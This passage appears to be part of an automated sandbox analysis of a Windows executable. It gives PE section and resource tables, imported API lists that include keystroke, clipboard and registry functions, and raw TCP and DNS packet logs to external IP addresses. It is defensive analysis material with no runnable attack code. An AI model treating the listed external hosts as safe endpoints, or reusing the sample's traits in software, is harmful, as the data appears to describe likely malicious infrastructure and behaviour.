                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                  .text0x10000x728c0x7400False0.656654094828data6.49970859063IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rdata0x90000x2b6e0x2c00False0.367897727273data4.49793253515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .data0xc0000x72b9c0x200False0.279296875data1.80494062846IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                  .ndata0x7f0000xb50000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .rsrc0x1340000xc3080xc400False0.0863560267857data2.71075910677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                  .reloc0x1410000xfd60x1000False0.062744140625PGP\011Secret Sub-key -2.12802410158IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                  Resources

                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                  RT_ICON0x1343580x4228dataEnglishUnited States
                                                                                                                                                  RT_ICON0x1385800x25a8dBase III DBT, version number 0, next free block index 40, 1st item "I\310\354\377\221\347\377\377s\337\375\377\265\357\377\377\227\350\377\377\214\346\377\377\213\346\377\377\212\345\377\377\211\345\377\377\210\345\377\377\207\345\377\377\206\344\377\377\205\344\377\377\204\344\377\377U\312\355\377u\333\371\377\203\344\377\377F\301\347\377"EnglishUnited States
                                                                                                                                                  RT_ICON0x13ab280x1a68dBase III DBT, version number 0, next free block index 40EnglishUnited States
                                                                                                                                                  RT_ICON0x13c5900x10a8dataEnglishUnited States
                                                                                                                                                  RT_ICON0x13d6380xfe9dataEnglishUnited States
                                                                                                                                                  RT_ICON0x13e6280x988dataEnglishUnited States
                                                                                                                                                  RT_ICON0x13efb00x6b8dataEnglishUnited States
                                                                                                                                                  RT_ICON0x13f6680x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                  RT_DIALOG0x13fad00x100dataEnglishUnited States
                                                                                                                                                  RT_DIALOG0x13fbd00x11cdataEnglishUnited States
                                                                                                                                                  RT_DIALOG0x13fcf00xc4dataEnglishUnited States
                                                                                                                                                  RT_DIALOG0x13fdb80x60dataEnglishUnited States
                                                                                                                                                  RT_GROUP_ICON0x13fe180x76dataEnglishUnited States
                                                                                                                                                  RT_VERSION0x13fe900x18cPGP symmetric key encrypted data - Plaintext or unencrypted data
                                                                                                                                                  RT_MANIFEST0x1400200x2e1XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                                                  Imports

                                                                                                                                                  DLLImport
                                                                                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                  Version Infos

                                                                                                                                                  DescriptionData
                                                                                                                                                  LegalCopyright
                                                                                                                                                  ProductVersion0.0.0
                                                                                                                                                  FileVersion0.0.0
                                                                                                                                                  FileDescription
                                                                                                                                                  Translation0x0000 0x04b0

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishUnited States

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 5, 2020 08:41:53.396342039 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:53.419894934 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:53.420084953 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:53.420881033 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:53.420972109 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:53.444530964 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:53.444561958 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:54.931421995 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:54.972645998 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:55.029978037 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:55.030023098 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:41:55.053693056 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:55.053736925 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:57.531936884 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:57.582412004 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.116226912 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.140170097 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:48.140362024 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.140707016 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.140763044 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:48.164212942 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:48.164251089 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:52.078556061 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:52.133634090 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.574632883 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.598304033 CET8049734104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:57.598402977 CET4973480192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.924711943 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.924752951 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:57.948404074 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:57.948445082 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:59.278107882 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:59.278158903 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:59.278300047 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:59.316557884 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:59.316618919 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:42:59.340292931 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:59.340337038 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:02.855652094 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:02.900206089 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:03.095493078 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:03.095556974 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:03.119226933 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:03.119262934 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:03.119288921 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:04.337274075 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:04.348758936 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:04.348802090 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:04.372395039 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:04.372437000 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:07.258394003 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:07.292275906 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:07.315965891 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:08.427812099 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:08.427855015 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:08.428031921 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:12.423928976 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.447808981 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.448055029 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.450779915 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.474365950 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.476684093 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.476727009 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.476861954 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.482043028 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.505711079 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.510257006 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.557308912 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.606618881 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.606662989 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:12.630362034 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.630414009 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:13.062382936 CET44349739172.67.142.39192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:13.104167938 CET49739443192.168.2.3172.67.142.39
                                                                                                                                                  Dec 5, 2020 08:43:28.422986031 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:28.446660042 CET8049740104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:28.446923018 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:28.448842049 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:28.448959112 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:28.472414970 CET8049740104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:28.472453117 CET8049740104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:30.096564054 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:30.097744942 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:30.120212078 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:30.121156931 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:32.399786949 CET8049740104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:32.449434042 CET4974080192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.078567982 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.102315903 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:33.103343964 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.103669882 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.103720903 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:33.127188921 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:33.127238989 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:34.401576996 CET8049738104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:34.449618101 CET4973880192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:36.861763954 CET8049741104.28.4.129192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:36.913867950 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:40.024529934 CET4974180192.168.2.3104.28.4.129
                                                                                                                                                  Dec 5, 2020 08:43:40.024590969 CET4974180192.168.2.3104.28.4.129

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 5, 2020 08:40:16.078028917 CET6349253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:16.105356932 CET53634928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:17.102169991 CET6083153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:17.129614115 CET53608318.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:18.101419926 CET6010053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:18.128889084 CET53601008.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:19.030033112 CET5319553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:19.057182074 CET53531958.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:20.430130959 CET5014153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:20.465615034 CET53501418.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:21.566843987 CET5302353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:21.602277040 CET53530238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:22.508847952 CET4956353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:22.536039114 CET53495638.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:24.281058073 CET5135253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:24.316639900 CET53513528.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:25.486912012 CET5934953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:25.514307022 CET53593498.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:26.133063078 CET5708453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:26.160259962 CET53570848.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:26.928248882 CET5882353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:26.955522060 CET53588238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:43.802752018 CET5756853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:43.841918945 CET53575688.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:40:44.715892076 CET5054053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:40:44.743092060 CET53505408.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:05.129650116 CET5436653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:41:05.166774988 CET53543668.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:49.993284941 CET5303453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:41:50.030539989 CET53530348.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:52.231416941 CET5776253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:41:52.275213957 CET53577628.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:41:53.342662096 CET5543553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:41:53.382879019 CET53554358.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:11.372323036 CET5071353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:42:11.399462938 CET53507138.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:19.426088095 CET5613253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:42:19.461699009 CET53561328.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:42:48.059262991 CET5898753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:42:48.097821951 CET53589878.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:12.375412941 CET5657953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:12.422032118 CET53565798.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:28.374576092 CET6063353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:28.410265923 CET53606338.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:33.014781952 CET6129253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:33.050405025 CET53612928.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:39.265126944 CET6361953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:39.331986904 CET53636198.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:39.912610054 CET6493853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:39.958705902 CET53649388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:40.636617899 CET6194653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:40.672032118 CET53619468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:41.071295977 CET6491053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:41.106627941 CET53649108.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:41.565464020 CET5212353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:41.600852966 CET53521238.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:42.171019077 CET5613053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:42.206612110 CET53561308.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:42.847573996 CET5633853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:42.883097887 CET53563388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:43.564450026 CET5942053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:43.599741936 CET53594208.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:43.892729998 CET5878453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:43.928317070 CET53587848.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:44.932121038 CET6397853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:44.967658043 CET53639788.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:45.510519981 CET6293853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:45.545907974 CET53629388.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.052850008 CET5570853192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.052906036 CET5680353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.439646006 CET53568038.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.448940039 CET5714553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.481640100 CET53557088.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.488394976 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.492825985 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.497859001 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.503201962 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.507247925 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.542771101 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.815103054 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.870011091 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.884772062 CET53571458.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.886359930 CET5535953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.894771099 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.920553923 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.921921015 CET53553598.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:46.924384117 CET5830653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:46.959666014 CET53583068.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:47.464710951 CET6412453192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:47.500004053 CET53641248.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.010875940 CET4936153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.046248913 CET53493618.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.114943027 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.118016005 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.121144056 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.124800920 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.150399923 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.467833042 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.469470978 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.470809937 CET6315053192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.504851103 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.506387949 CET53631508.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.506843090 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.508157969 CET5327953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.534665108 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.541173935 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.541522980 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.542056084 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.542855978 CET5688153192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.557689905 CET5364253192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.576889992 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.578296900 CET53568818.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.578788042 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.580691099 CET5566753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.593235016 CET53536428.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.614557981 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.616168976 CET53556678.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.616544008 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.617836952 CET5483353192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.654295921 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.654336929 CET53548338.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.654639006 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.656128883 CET6247653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.681833982 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.691803932 CET53624768.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.692184925 CET5714653192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.693607092 CET4970553192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:48.727684975 CET53571468.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:48.729172945 CET53497058.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.105391026 CET6147753192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.141067982 CET53614778.8.8.8192.168.2.3
                                                                                                                                                  Dec 5, 2020 08:43:49.510230064 CET5327953192.168.2.38.8.8.8
                                                                                                                                                  Dec 5, 2020 08:43:49.545767069 CET53532798.8.8.8192.168.2.3
